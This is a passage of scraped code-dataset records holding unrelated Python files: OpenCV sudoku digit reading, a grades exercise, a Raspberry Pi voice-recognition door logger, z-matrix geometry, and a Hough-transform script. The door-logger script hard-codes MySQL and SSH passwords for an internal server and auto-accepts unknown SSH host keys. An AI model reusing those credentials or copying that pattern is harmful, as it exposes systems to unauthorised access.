np.sqrt(polygon[0][0][0]**2 + polygon[0][0][1]**2)\n minc = 0\n for i in range(1,4):\n if np.sqrt(polygon[i][0][0]**2 + polygon[i][0][1]**2) < min_:\n min_ = np.sqrt(polygon[i][0][0]**2 + polygon[i][0][1]**2)\n minc = i\n\n #found top left vertex, rotate until it's on the top left\n for i in range(minc):\n polygon = np.roll(polygon,-1,axis=0)\n\n #if needed, \"invert\" the order.\n dist1 = dist_line(polygon[0],polygon[2],polygon[1])\n dist3 = dist_line(polygon[0],polygon[2],polygon[3])\n if dist3 > dist1:\n x = polygon[3][0][0]\n y = polygon[3][0][1]\n polygon[3][0][0] = polygon[1][0][0]\n polygon[3][0][1] = polygon[1][0][1]\n polygon[1][0][0] = x\n polygon[1][0][1] = y\n ret[0] = polygon[0][0]\n ret[1] = polygon[1][0]\n ret[2] = polygon[2][0]\n ret[3] = polygon[3][0]\n return ret\n\ndef to_binary(image):\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray_image = cv2.GaussianBlur(gray_image,(5,5),0)\n image2 = cv2.adaptiveThreshold(gray_image,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV ,75,5)\n return image2\n\ndef get_tile(image):\n image2 = to_binary(image)\n\n contours, hierarchy = cv2.findContours(image2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n biggest = None\n max_area = 0\n for i in contours:\n area = cv2.contourArea(i)\n if area > 100:\n peri = cv2.arcLength(i,True)\n approx = cv2.approxPolyDP(i,0.02*peri,True)\n if area > max_area and len(approx)==4:\n biggest = approx\n max_area = area\n\n\n dst_bounds = np.array([ [0,0],[899,0],[899,899],[0,899] ],np.float32)\n biggest = fix_poly(biggest)\t# we put the corners of biggest square in CW order to match with h\n\n transform = cv2.getPerspectiveTransform(biggest,dst_bounds)\t# apply perspective transformation\n warp = cv2.warpPerspective(image,transform,(900,900))\n return warp\n\n\n\ndef train(): #from opencv tutorial\n img = cv2.imread('digits.png')\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n # Now we split the image to 5000 cells, each 20x20 size\n cells = [np.hsplit(row,100) for row in np.vsplit(gray,50)]\n\n # Make it into a Numpy array. It size will be (50,100,20,20)\n x = np.array(cells)\n\n # Now we prepare train_data and test_data.\n train = x[:,:50].reshape(-1,400).astype(np.float32) # Size = (2500,400)\n test = x[:,50:100].reshape(-1,400).astype(np.float32) # Size = (2500,400)\n\n # Create labels for train and test data\n k = np.arange(10)\n train_labels = np.repeat(k,250)[:,np.newaxis]\n test_labels = train_labels.copy()\n\n # Initiate kNN, train the data, then test it with test data for k=1\n knn = cv2.KNearest()\n knn.train(train,train_labels)\n return knn\n\ndef avg_distance(point,contour):\n dists = [ np.sqrt((point[0] - i[0][0])**2 +(point[1] - i[0][1])**2 ) for i in contour]\n return sum(dists) / len(dists)\n\ndef get_number(image):\n image2 = image.copy()\n contours, hierarchy = cv2.findContours(image2, cv2.RETR_TREE, cv2.CHAIN_APPROX_TC89_L1)\n closest = None\n flag = False\n max_dist = 500 #outside of 100x100 image\n arr = []\n for i in contours:\n area = cv2.contourArea(i)\n dist = avg_distance((50,50),i)\n peri = cv2.arcLength(i,True)\n # dist = cv2.pointPolygonTest(i,(len(image)/2,len(image[0])),True)\n if peri > 100 and dist < max_dist and dist < 40:\n flag = True\n max_dist = dist\n closest = i\n if not flag:\n return None\n arr.append(closest)\n # dst_bounds = np.array([ [0,0],[19,0],[19,19],[0,19] ],np.float32)\n # biggest = fix_poly(biggest)\t# we put the corners of biggest square in CW order to match with h\n #\n # transform = cv2.getPerspectiveTransform(biggest,dst_bounds)\t# apply perspective transformation\n # warp = cv2.warpPerspective(image,transform,(20,20))\n return arr\n\ndef contour_mask(image,contour):\n mask = np.zeros_like(image)\n cv2.drawContours(mask, contour, -1, 255,thickness=-1)\n res = cv2.bitwise_and(image,image,mask = mask)\n return res\n\ndef get_numbers(image):\n warp = get_tile(image)\n\n bw = to_binary(warp)\n #\n # cv2.imshow(\"bw\",bw)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n sudoku = []\n for i in range(9):\n ln = []\n for j in range(9):\n ln.append(bw[i*100:(i+1)*100, j*100:(j+1)*100 ])\n sudoku.append(ln)\n\n # knn = train()\n nimg = np.zeros((900,900,3), np.uint8)\n\n sudoku_contour = []\n for i in range(9):\n ln = []\n for j in range(9):\n im = get_number(sudoku[i][j])\n ln.append(im)\n sudoku_contour.append(ln)\n\n numbers = []\n for i in range(9):\n ln = []\n for j in range(9):\n if sudoku_contour[i][j] == None:\n ln.append(0)\n else:\n im = contour_mask(sudoku[i][j],sudoku_contour[i][j])\n result = image_to_string(Image.fromarray(im),config=\"-psm 6\")\n # im = cv2.resize(im,(20,20))\n # (result,_,_,_) = knn.find_nearest(im.reshape(-1,400).astype(np.float32),5)\n ln.append(int(result))\n numbers.append(ln)\n\n return numbers,warp\n\ndef print_numbers(image,numbers):\n for i in range(9):\n for j in range(9):\n cv2.putText(image,\"%d\" % ( int(numbers[i][j]) ) ,(30 + 100*j,80+100*i),1,5,(0,0,255),5)\n","sub_path":"sudokuFlask/sudoku/get_numbers.py","file_name":"get_numbers.py","file_ext":"py","file_size_in_byte":5862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"505621709","text":"# The following sample file called studentdata.txt contains one line for each\n# student in an imaginary class. The student’s name is the first thing on each\n# line, followed by some exam scores. The number of scores might be different\n# for each student.\n#\n# joe 10 15 20 30 40\n# bill 23 16 19 22\n# sue 8 22 17 14 32 17 24 21 2 9 11 17\n# grace 12 28 21 45 26 10\n# john 14 32 25 16 89\n#\n# Using the text file studentdata.txt write a program that prints out the\n# names of students that have more than six quiz scores.\n\n\ndef average(lst):\n return sum(lst) / len(lst)\n\n\ndef main():\n file_ref = open('w:\\lc101\\Hacker Chapter - Files\\studentdata.txt', 'r')\n line = file_ref.readline()\n while line:\n words = line.split()\n exam_score_count = len(words) - 1 # Don't count student name\n if exam_score_count >= 1:\n student = words[0]\n exam_scores = [int(word) for word in words[1:]]\n average_grade = average(exam_scores)\n print(\"Student: {} - Avg Grade: {:.1f}\".format(student,\n average_grade))\n line = file_ref.readline()\n file_ref.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"unit1/Hacker Chapter - Files/Files - Exercise 02.py","file_name":"Files - Exercise 02.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139512467","text":"#!/usr/bin/python3.5\n#Voice Recognition\nimport speech_recognition as sr\nimport os\nimport unidecode\n\n#Image Capturin\nimport datetime\nimport sys\nimport time\nimport subprocess\n\n#Store Image\nimport mysql.connector\nfrom mysql.connector import Error\n\n#Turn on/off LEDS\nimport RPi.GPIO as GPIO\n\n#Library to read CSV\nimport csv\nimport json\n\n#Library to export data\nimport paramiko\n\ntime.sleep(10)\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(12, GPIO.OUT)\nGPIO.setup(20, GPIO.OUT)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(16, GPIO.OUT)\n\nproxy = None\nhosts = ('google.com', 'kernel.org', 'yahoo.com')\nlocalhost = ('10.0.5.246')\n\nwith open('/home/pi/Documents/visualizacion_photo/seg.json', 'r', encoding='utf-8') as json_data:\n vrb = json.load(json_data)\n\ndef ping(host):\n ret = subprocess.call(['ping', '-c', '3', '-W', '5', host],\n stdout=open('/dev/null', 'w'),\n stderr=open('/dev/null', 'w'))\n return ret == 0\n\ndef net_is_up():\n print (\"[%s] Checking if network is up...\" % str(datetime.datetime.now()))\n \n xstatus = 0\n for h in hosts:\n if ping(h):\n if ping(localhost):\n print (\"[%s] Network is up!\" % str(datetime.datetime.now()))\n xstatus = 1\n break\n\n if not xstatus:\n time.sleep(10)\n print (\"[%s] Network is down :(\" % str(datetime.datetime.now()))\n time.sleep(25)\n\n return xstatus\n\ndef get_name(Name):\n reader = csv.reader(open(\"nombres.csv\", \"rt\"), delimiter=\",\")\n x=list(reader)\n\n Name2=Name[1]\n Name2=Name2.upper()\n\n for item in x:\n if str(Name2) == item[0]:\n return Name[0], Name2, True\n break\n return Name[0], \"\", False\n\ndef store(path, name, person, nameservidor):\n while True:\n if(net_is_up()):\n try:\n #Connection and insert with mysql complete\n mydb = mysql.connector.connect(host=\"10.0.5.246\", user=\"LMV_ADMIN\", passwd=\"MINIMOT4\", database=\"LMV\")\n mycursor = mydb.cursor()\n sql = \"INSERT INTO imagespath (path, name, person) VALUES (%s, %s, %s)\"\n val = (path, name, person)\n mycursor.execute(sql, val)\n mydb.commit()\n print(mycursor.rowcount, \"record inserted\")\n mydb.close()\n break\n except mysql.connector.Error as err:\n print(\"Something went wrong: {}\".format(err))\n while True:\n if(net_is_up()):\n try:\n #Almacenar la foto en servidor para mostrar en imagen\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect('10.0.5.246', port=19930, username='lmv-codedata', password='Laboratorio', sock=proxy)\n ftp_client = client.open_sftp()\n ftp_client.put(nameservidor, '/var/www/html/ENTRADA-LMV/Images_Access/'+nameservidor)\n ftp_client.close()\n break\n except paramiko.AuthenticationException as err:\n print(\"Fallo en la autentificacion, verifica tus credenciales por favor\")\n except paramiko.BadAuthenticationType:\n print(\"ERROR\")\n except paramiko.BadHostKeyException:\n print(\"Incapaz de verificar claves del host del servidor\")\n except paramiko.ChannelException:\n print(\"ERROR\")\n except paramiko.PartialAuthentication as er:\n print(\"ERROR\")\n except paramiko.PasswordRequiredException:\n print(\"ERROR\")\n except paramiko.ProxyCommandFailure:\n print(\"ERROR\")\n except paramiko.SSHException:\n print(\"Incapaz de establecer conexion ssh\")\n finally:\n ftp_client.close()\n\ndef security_name(name, spc):\n n = name.lower()\n for x in range(0,7):\n for pat in vrb['permisos'][x]['persona']:\n if pat == n:\n if spc == vrb['permisos'][x]['id']:\n return True, vrb['permisos'][x]['name']\n return False, \"Usuario o contraseña incorrectos\"\n\ndef take_photo(name, id_):\n validacion, comprobacion = security_name(name, id_)\n if validacion:\n script_dir = os.path.dirname(__file__)\n direc = os.path.dirname(os.path.abspath(__file__))\n os.system('./webcam.sh')\n currentdate = datetime.datetime.now().strftime(\"%Y-%m-%d_%H%M\")\n real_path = currentdate +\".jpg\"\n abs_file_path = os.path.join(script_dir, real_path)\n GPIO.output(20, False)\n GPIO.output(16, True)\n time.sleep(2)\n store(direc, abs_file_path, comprobacion, real_path)\n GPIO.output(16, False)\n time.sleep(2)\n return False\n else:\n return False\n\ndef listen_welcome():\n r = sr.Recognizer()\n m = sr.Microphone()\n with m as source:\n try:\n print(\"Adjusting noise\")\n r.adjust_for_ambient_noise(source, duration=-1)\n print(\"Say something!\")\n GPIO.output(20, False)\n GPIO.output(12, True)\n print(\"LISTENED\")\n audio = r.listen(source, timeout=5, phrase_time_limit=8)\n GPIO.output(12, False)\n GPIO.output(20, True)\n print(\"Trying to recognize\")\n x = r.recognize_google(audio, language=\"es-mx\")\n x = x.split(\" \")\n #print(x)\n if len(x) != 2:\n return False, \"\", \"\"\n idu, nombre, estado = get_name(x)\n #print(frase, nombre, estado)\n if estado == False:\n return False, nombre, idu\n if (idu == \"cero\" or idu == \"uno\" or idu == \"dos\" or idu ==\"tres\" or idu == 'cuatro' or idu == 'cinco'or idu == 'seis'):\n return True, nombre, idu\n except sr.UnknownValueError:\n print(\"Error trying to understand what you say to me\")\n return False, \"\", \"\"\n except sr.RequestError as e:\n print(\"I can't reach google, it's to sad\")\n return False, \"\", \"\"\n except Exception as e:\n print(e)\n return False, \"\", \"\"\n except LookupError:\n return False, \"\", \"\"\n except UnicodeDecodeError:\n return False, \"\", \"\"\n return False, \"\", \"\"\n\nwhile True:\n try:\n flag_order = True\n flag_start, nam, id_ = listen_welcome()\n if flag_start:\n while flag_order:\n flag_order = take_photo(nam, id_)\n except ValueError:\n print(\"Measurement stopped by Error\")\n except OSError as err:\n print(\"OS error: {0}\".format(err))\n #except KeyboardInterrupt:\n # print(\"Measurement stopped by User\")\n","sub_path":"visualizacion_photo/controlscript.py","file_name":"controlscript.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"437280430","text":"#!/usr/bin/env python\n\n\"\"\"\nAuthor: Rosa Bulo, 2021\n\nClass holding a z-matrix with reordered atoms\n\"\"\"\n\nimport sys\nimport os\nimport copy\nimport numpy\nfrom scm.plams import angle\nfrom scm.plams import dihedral\nfrom scm.plams import axis_rotation_matrix\n\n__all__ = ['ZMatrix']\n\nclass ZMatrix :\n \"\"\"\n Holds the zmatrix for a molecule, with reordered atoms\n \"\"\"\n def __init__ (self) :\n \"\"\"\n Initiates an instance of the ZMatrix class\n \"\"\"\n self.mol = None\n self.atom_list = None\n self.connectivity = None\n self.indices = None\n\n self.backbone = None\n self.terminal_atoms = None\n\n self.angle_units = 'radian'\n\n def prepare_state (self, mol) :\n \"\"\"\n Generates optimal z-martrix by reordering the atoms\n \"\"\"\n self.mol = mol\n self.backbone = self.mol.find_main_chain()\n self.terminal_atoms = self.mol.get_terminal_atoms()\n self.create_connectivity()\n self.get_values()\n\n def get_values (self, coords=None) :\n \"\"\"\n Get the values in the zmatrix\n\n Note: Angles are in radians\n \"\"\"\n mol = self.mol.copy()\n if coords is not None :\n mol.from_array(coords)\n else :\n coords = mol.as_array()\n\n internal_coords = []\n for i,at in enumerate(self.atom_list) :\n atoms = [mol.atoms[at]]\n conect = self.connectivity[i]\n atoms += [mol.atoms[at] for at in conect]\n values = []\n dist = 0.\n if len(conect) > 0 :\n dist = mol.atoms[at].distance_to(mol.atoms[conect[0]])\n values.append(dist)\n phi = 0.\n if len(conect) > 1 :\n vec1 = coords[at] - coords[conect[0]]\n vec2 = coords[conect[1]] - coords[conect[0]]\n phi = angle(vec1, vec2, result_unit=self.angle_units)\n values.append(phi)\n theta = 0.\n if len(conect) > 2 :\n theta = dihedral(atoms[0].coords, atoms[1].coords, atoms[2].coords, atoms[3].coords, unit=self.angle_units)\n values.append(theta)\n internal_coords.append(values)\n internal_coords = numpy.array(internal_coords)\n\n return internal_coords\n\n def get_cartesian_coords (self, zmat_values) :\n \"\"\"\n Convert z-matrix values to Cartesian coordinates\n\n * ``zmat_values`` -- All angles are in radians\n \"\"\"\n coords = numpy.zeros((len(self.mol),3))\n\n # Create the internal coordinate axes\n v_ij, v_m, v_n = numpy.identity(3)\n\n coord = numpy.zeros(3)\n for i,iat in enumerate(self.atom_list) :\n conect = self.connectivity[i]\n d,a,t = zmat_values[i]\n\n if len(conect) == 0 :\n coords[iat] = 0.\n continue\n \n i = conect[0]\n # Create the internal coordinate axes\n v_ij, v_m, v_n = numpy.identity(3) \n if len(conect) > 1 : \n j = conect[1]\n # Get the vector from i to j\n v_ij = coords[j] - coords[i]\n v_ij = v_ij / numpy.sqrt((v_ij**2).sum())\n \n if len(conect) > 2 :\n k = conect[2]\n # Get the vector from j to k\n v_jk = coords[k] - coords[j]\n \n # Get the vector orthoganl to the plane ijk\n v_n = numpy.cross(v_ij,v_jk)\n v_n = v_n / numpy.sqrt((v_n**2).sum())\n \n # Get the vector orthogonal to the plane though i, j, and v_n\n v_m = numpy.cross(v_n,v_ij)\n v_m = v_m / numpy.sqrt((v_m**2).sum())\n \n # Now get the coordinates in the coordinate system of v_ij, v_m, and v_n\n coord[0] = d * numpy.cos(a)\n coord[1] = d * numpy.sin(a) * numpy.cos(t)\n coord[2] = d * numpy.sin(a) * numpy.sin(-t)\n \n # translate it to the actual xyz coordinate system\n coords[iat] = coords[i] + (coord[0]*v_ij) + (coord[1]*v_m) + (coord[2]*v_n)\n\n return coords\n\n def print_zmatrix (self, zmat_values) :\n \"\"\"\n Write the z-matrix\n \"\"\"\n elements = [at.symbol for at in self.mol.atoms]\n block = ''\n conns = numpy.zeros(3)\n for i,el in enumerate(elements) :\n block += '%8s '%(el)\n conns[:len(self.connectivity[i])] = self.connectivity[i]\n for iat in conns :\n block += '%5i '%(iat)\n for v in zmat_values[i] :\n block += '%20.10f '%(v)\n block += '\\n'\n return block\n\n def create_connectivity (self) :\n \"\"\"\n Create the new atom ordering and connectivity\n \"\"\"\n # Get the starting atom (will fail for methane)\n start_index = self.get_first_atom()\n if start_index is None :\n print ('Warning: No zmatrix could be generated')\n return\n start = self.backbone[start_index]\n\n # Get the first four atoms in the new z-matrix\n atom_list = self.backbone[start_index:start_index+4]\n connectivity = [[], atom_list[:1][::-1], atom_list[:2][::-1], atom_list[:3][::-1]] # Use internal numbering instead?\n level_dictionary = {0:[atom_list[0]],1:[atom_list[1]],2:[atom_list[2]],3:[atom_list[3]]}\n\n # Now loop over neighbors starting with the start atom\n level = 0\n while level in level_dictionary :\n for at in level_dictionary[level] :\n iat = atom_list.index(at)\n neighbors = [self.mol.index(n)-1 for n in self.mol.neighbors(self.mol.atoms[at])]\n for at_next in neighbors :\n if at_next in atom_list : continue\n # This atom we will append to the z-matrix\n atom_list.append(at_next)\n if not level+1 in level_dictionary :\n level_dictionary[level+1] = []\n level_dictionary[level+1].append(at_next)\n conect = [at] + connectivity[iat][:2]\n # Now what if there is not enough connectivity here (only happens for first two atoms)?\n if len(conect) < 3 :\n conect = atom_list[iat:iat+3]\n connectivity.append(conect)\n level += 1\n\n self.atom_list = atom_list\n self.connectivity = connectivity\n self.indices = [self.atom_list.index(i) for i in range(len(self.mol))]\n\n def get_first_atom (self) :\n \"\"\"\n Get the starting atom (heavy atom with highest valence?)\n\n Note: May change self.backbone!\n \"\"\"\n # Get the starting atom (heavy atom with highest valence?)\n valences = []\n for at in self.backbone : \n nbs = [n for n in self.mol.neighbors(self.mol.atoms[at]) if not self.mol.index(n)-1 in self.terminal_atoms]\n valences.append(len(nbs))\n indices = numpy.array(valences).argsort()\n\n if len(self.backbone) < 4 :\n # I have to create a new backbone in this case\n self.extend_backbone()\n if len(self.backbone) < 4 :\n # Only methane\n return None\n for ind in indices :\n # The chain has to have 3 more atoms following the starting atom\n if len(self.backbone) > ind+3 :\n start_index = ind\n break\n elif ind >= 3 :\n # Invert the backbone\n self.backbone = self.backbone[::-1]\n start_index = len(self.backbone)-ind-1\n break\n return start_index\n\n def extend_backbone (self) :\n \"\"\"\n Extend the backbone at both ends\n \"\"\"\n pos = 0\n neighbor = self.find_neighbor_to_backbone(pos)\n if neighbor is not None :\n self.backbone = [neighbor] + self.backbone\n pos = -1\n neighbor = self.find_neighbor_to_backbone(pos)\n if neighbor is not None :\n self.backbone = self.backbone + [neighbor]\n\n def find_neighbor_to_backbone (self, pos) :\n \"\"\"\n Find extension atom to backbone\n\n * ``pos`` -- Integer representing the head (0) or the tail (-1) of the backbone\n \"\"\"\n neighbor = None\n neighbors = [self.mol.index(n)-1 for n in self.mol.neighbors(self.mol.atoms[self.backbone[pos]])]\n neighbors = [atn for atn in neighbors if not atn in self.backbone]\n if len(neighbors) > 0 :\n neighbor = neighbors[0]\n return neighbor\n\n","sub_path":"TorsionNet/DavidNet/conformers/molecularsystem/zmatrix.py","file_name":"zmatrix.py","file_ext":"py","file_size_in_byte":10838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"84897908","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('register', '0004_remove_usuario_email'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Cliente',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),\n ('nombre', models.CharField(max_length=30)),\n ('apellido', models.CharField(max_length=30)),\n ('direccion', models.CharField(max_length=30)),\n ('telefono', models.IntegerField()),\n ],\n ),\n migrations.RemoveField(\n model_name='usuario',\n name='apellido',\n ),\n migrations.RemoveField(\n model_name='usuario',\n name='direccion',\n ),\n migrations.RemoveField(\n model_name='usuario',\n name='nombre',\n ),\n migrations.RemoveField(\n model_name='usuario',\n name='telefono',\n ),\n migrations.AlterField(\n model_name='ṕroveedor',\n name='usuario',\n field=models.ForeignKey(to='register.Cliente'),\n ),\n migrations.AddField(\n model_name='cliente',\n name='usuario',\n field=models.ForeignKey(to='register.Usuario'),\n ),\n ]\n","sub_path":"AQuienLlamo/register/migrations/0005_auto_20150611_0211.py","file_name":"0005_auto_20150611_0211.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"442736342","text":"import json\n\n\ndef main():\n data = {\"mod_vector\": {\"host1\": 21, \"host2\": 10}, \"sync_vector\": {\"host1\": 2, \"host2\": 15}}\n with open('example.json', 'w') as f:\n json.dump(data, f)\n\nif __name__ == '__main__':\n main()\n","sub_path":"fsync/json/write_sample_json.py","file_name":"write_sample_json.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"557321361","text":"\n\nfrom basetestcase import BaseTestCase\n\nfrom TestInput import TestInputSingleton\nfrom sg.sg_base import GatewayBaseTest\nfrom remote.remote_util import RemoteMachineShellConnection\n\nhelp = ['This script creates an init service to run a sync_gateway instance.',\n 'If you want to install more than one service instance',\n 'create additional services with different names.',\n '', 'sync_gateway_service_install.sh', ' -h --help',\n ' --runas=',\n ' --runbase=',\n ' --sgpath=',\n ' --cfgpath=',\n ' --logsdir=', '']\n\n\nclass SGInstallerTest(GatewayBaseTest):\n def setUp(self):\n TestInputSingleton.input.test_params[\"default_bucket\"] = False\n super(SGInstallerTest, self).setUp()\n\n def tearDown(self):\n super(SGInstallerTest, self).tearDown()\n\n\n def basicInstall(self):\n for server in self.servers:\n shell = RemoteMachineShellConnection(server)\n self.install(shell)\n self.kill_processes_gateway(shell)\n self.uninstall_gateway(shell)\n shell.disconnect()\n\n\n def testSGServiceInstallHelp(self):\n shell = RemoteMachineShellConnection(self.master)\n self.kill_processes_gateway(shell)\n self.uninstall_gateway(shell)\n self.install_gateway(shell)\n output, error = self.run_sync_gateway_service_install(shell, \"-h\")\n self.assertEqual(error, [])\n self.assertEqual(output, help)\n\n output, error = self.run_sync_gateway_service_install(shell)\n self.assertEqual(error[0], \"The sync_gateway runtime user account does not exist \\\"sync_gateway\\\".\")\n self.assertEqual(output, [])\n\n output, error = self.run_sync_gateway_service_install(shell, \"bla-bla-bla\")\n temp_help = [\"ERROR: unknown parameter \\\"bla-bla-bla\\\"\"]\n temp_help.extend(help)\n\n self.assertEqual(error, [])\n self.assertEqual(output, temp_help)\n shell.disconnect()\n\n\n def testSGServiceInstallNoUser(self):\n shell = RemoteMachineShellConnection(self.master)\n self.kill_processes_gateway(shell)\n self.uninstall_gateway(shell)\n self.install_gateway(shell)\n output, error = self.run_sync_gateway_service_install(shell, self.extra_param)\n self.assertEqual(error, [self.expected_error])\n self.assertEqual(output, [])\n shell.disconnect()","sub_path":"pytests/sg/sginstalltests.py","file_name":"sginstalltests.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"21927385","text":"class UI(object):\n def __init__(self, screen_width, screen_height, plus = 0):\n self.screen_width = screen_width\n self.screen_height = screen_height\n self.plus = plus\n \n def display(self, grid, policy, r):\n s = self.screen_width / 4\n for rows in grid:\n for cell in rows:\n \n x = (cell.j * s) + self.plus\n y = cell.i * s\n stroke(255)\n strokeWeight(2)\n fill(255,255,255,100)\n rect(x, y, s, s)\n if cell.terminal:\n rect(x+6, y+6, s-12, s-12)\n fill(255,255,255)\n text(\"{0:.4f}\".format(cell.u), x+(s / 6), y + (s /2))\n stroke(0, 102, 255) \n strokeWeight(3)\n line(self.plus, 0, self.plus, self.screen_height)\n line(self.screen_width + self.plus, 0, self.screen_width + self.plus, self.screen_height)\n \n half = self.screen_height / 2\n txt = \"R= \" + str(r) +\" \\t POLICY:\"\n fill(255,255,255)\n text(txt, 20 + self.plus , half + 10)\n \n for i in range(3):\n for j in range(4):\n pass\n x_ = (j * s) + self.plus\n y_ = (i * s) + (half + 20)\n \n stroke(255)\n strokeWeight(2)\n fill(255,255,255,100)\n rect(x_, y_, s, s)\n fill(255,255,255)\n text(\"{}\".format(policy[i][j]), x_+(s / 6), y_ + (s /2))\n","sub_path":"MDP_Algorithm/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"293236598","text":"# build.py\nimport os\nimport platform\nimport sys\nfrom distutils.core import setup\n\nfrom torch.utils.ffi import create_extension\n\nextra_compile_args = ['-std=c++11', '-fPIC']\nwarp_ctc_path = \"../build\"\n\nif platform.system() == 'Darwin':\n lib_ext = \".dylib\"\nelse:\n lib_ext = \".so\"\n\nif \"WARP_CTC_PATH\" in os.environ:\n warp_ctc_path = os.environ[\"WARP_CTC_PATH\"]\nif not os.path.exists(os.path.join(warp_ctc_path, \"libwarpctc\" + lib_ext)):\n print((\"Could not find libwarpctc.so in {}.\\n\"\n \"Build warp-ctc and set WARP_CTC_PATH to the location of\"\n \" libwarpctc.so (default is '../build')\").format(warp_ctc_path))\n sys.exit(1)\ninclude_dirs = [os.path.realpath('../include')]\n\nffi = create_extension(\n name='warp_ctc',\n language='c++',\n headers=['src/binding.h'],\n sources=['src/binding.cpp'],\n with_cuda=True,\n include_dirs=include_dirs,\n library_dirs=[os.path.realpath(warp_ctc_path)],\n runtime_library_dirs=[os.path.realpath(warp_ctc_path)],\n libraries=['warpctc'],\n extra_compile_args=extra_compile_args)\nffi = ffi.distutils_extension()\nffi.name = 'warpctc_pytorch._warp_ctc'\nsetup(\n name=\"warpctc_pytorch\",\n version=\"0.1\",\n packages=[\"warpctc_pytorch\"],\n ext_modules=[ffi],\n)\n","sub_path":"pytorch_binding/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"180910482","text":"import requests\nimport os.path\n\nURL = \"http://127.0.0.1:3000/purchase\"\n\npath = os.path.abspath(os.path.join(\"\", os.pardir))\n\nid_pais = open(path + \"/inputs/values/purchase/idPai.txt\",\"r\")\nstatuses = open(path + \"/inputs/values/purchase/status.txt\",\"r\")\ntotal_prices = open(path + \"/inputs/values/purchase/totalPrice.txt\",\"r\")\nerrors = open(\"errorLog.txt\",\"a+\")\n\n\ncount = 1\nwhile 1:\n\tid_pai = id_pais.readline().strip('\\n')\n\tstatus = statuses.readline().strip('\\n')\n\ttotal_price = total_prices.readline().strip('\\n')\n\tdate = \"2018-06-14 4:20:00\"\n\n\tif not id_pai:\n\t\tbreak\n\t\t\n\tdata = {'id_pai':id_pai,\n\t 'status':status,\n\t 'total_price': total_price,\n\t 'date':date\n\t }\n\tr = requests.post(url = URL, data = data)\n\n\tif r.status_code == 200:\n\t\tprint(\"Successfully inserted 1 row at purchase table!\")\n\telse:\n\t\tprint(\"Something went terribly wrong at the purchase table!\")\n\t\terrors.write(\"Error at purchase table (line \" + str(count) + \"): \" + '('+ id_pai +', '+ status +','+total_price + ',' + date + \")\" + '\\n')\n\tcount+=1","sub_path":"post/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"522238249","text":"import cv2\nimport numpy as np\n\n# Read image\norg_img = cv2.imread(\"hough.jpg\")\nimg = cv2.imread(\"hough.jpg\", 0)\n\n###<<<<<<-----------------------------Edge detection---------------------------->>>>>>######\n\nlargest = 255\nsmallest = 0\nr,c = img.shape\n\ncount = 0\n\nimg1 = np.zeros(img.shape)\nkernel = [[-1,0,1],[-2,0,2],[-1,0,1]] \n\nfor x in range(1,r-1):\n for y in range(1,c-1): \n img1[x][y]= img[x-1][y-1] * kernel[0][0] + \\\n img[x-1][y] * kernel[0][1] + \\\n img[x-1][y+1] * kernel[0][2] + \\\n img[x][y-1] * kernel[1][0] + \\\n img[x][y] * kernel[1][1] + \\\n img[x][y+1] * kernel[1][2] + \\\n img[x+1][y-1] * kernel[2][0] + \\\n img[x+1][y] * kernel[2][1] + \\\n img[x+1][y+1] * kernel[2][2]\n \n if (img1[x][y] > largest):\n largest = img1[x][y]\n\nfor x in range(0,r):\n for y in range(0,c):\n img1[x][y] = (np.abs(img1[x][y]) / np.abs(largest))*255\n if (img1[x][y] > 80):\n img1[x][y] = 255\n count += 1\n else:\n img1[x][y] = 0\n\n \ncv2.imwrite('edge.jpg', img1)\n\n###<<<<<<-----------------------------create accumulator---------------------------->>>>>>######\n \nd = np.sqrt((r**2)+(c**2))\nd = int(d)\n\naccumulator = np.zeros((d,360))\n\nfor x in range(0,r):\n for y in range(0,c):\n if (img1[x][y] == 255):\n for deg in range (-180,180):\n r = x*np.cos(np.deg2rad(deg)) + y*np.sin(np.deg2rad(deg))\n r = int(r)\n if (r > 0 and r < d):\n accumulator[r][deg] = accumulator[r][deg]+1 \n \ncv2.imwrite(\"accumulator.jpg\",accumulator)\n\n###<<<<<<---------------------selecting highest voted points------------------------->>>>>>######\n\nidx = np.unravel_index(np.argsort(accumulator.ravel())[-1000:], accumulator.shape)\n\n###<<<<<<-----------------------------red lines detection---------------------------->>>>>>######\n\nrho = []\ntheta = []\n\nfor i in range (len(idx[0])):\n x = idx[0][i]\n y = idx[1][i]\n if (y == 306):\n 